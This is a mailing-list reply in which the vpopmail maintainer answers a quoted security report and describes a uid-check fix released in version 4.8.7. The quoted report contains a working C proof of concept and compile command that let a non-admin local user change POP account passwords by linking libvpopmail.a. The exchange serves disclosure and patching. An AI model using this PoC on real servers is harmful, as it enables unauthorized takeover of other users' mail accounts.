Oh man. Good idea you looked at this.
The solution isn't changing the access to the libraries.
It should be in the vauth modules to check for the uid
in the vauth_setpw and vauth_vpasswd functions.
I've fixed and tested it in 4.8.7
http://www.vpopmail.cx/vpopmail-4.8.7.tar.gz
You wouldn't see the problem using the cdb authentication
module. Since the cdb module requires access to files
that are protected by vpopmail permissions.
However it does show up in the other auth modules:
vmysql.c vsybase.c voracle.c
I put in checks for uid using getuid call.
The user has to be either vpopmail or root.
Ken Jones
"Sean P. Scanlon" wrote:
>
> [ Apologies if this has been previously covered ]
>
> Maybe I'm a bit paranoid..
> I know most people don't run shell/mail services on the same machine,
> But if you did it is possible for non-admin accounts to change the password
> of pop accounts.
>
> The simple fix is to chmod 0700 ~vpopmail/lib, which will prevent linking
> with the libvpopmail.a library.
>
> --vpop_sec_test.c--
> #include <stdio.h>
> #include <sys/time.h>
> #include <vpopmail.h>
> #include <vauth.h>
>
> extern int vpasswd( char *, char *, char *, int);
>
> int main(void) {
>
> if ( (vpasswd("user", "domain.net", "mynewpasswd", NULL) ) == 0 ){
> printf("changed passwd\n");
> }
> }
> --vpop_sec_test.c--
>
> $gcc -o test vpop_sec_test.o /home/vpopmail/lib/libvpopmail.a -L/usr/local/mysql/lib
>-lmysqlclient -lsocket -lnsl -lm
>
> $./test
> changed passwd
> $
>
> --
>
> --
> -------------------------
> Sean P. Scanlon
> [EMAIL PROTECTED]
> -------------------------
>
> "Personally, I think hashes are gods greatest gift to the programmer. I
> love them. If I could turn my wife into one, I would. "
> -seen in 'comp.lang.perl.misc'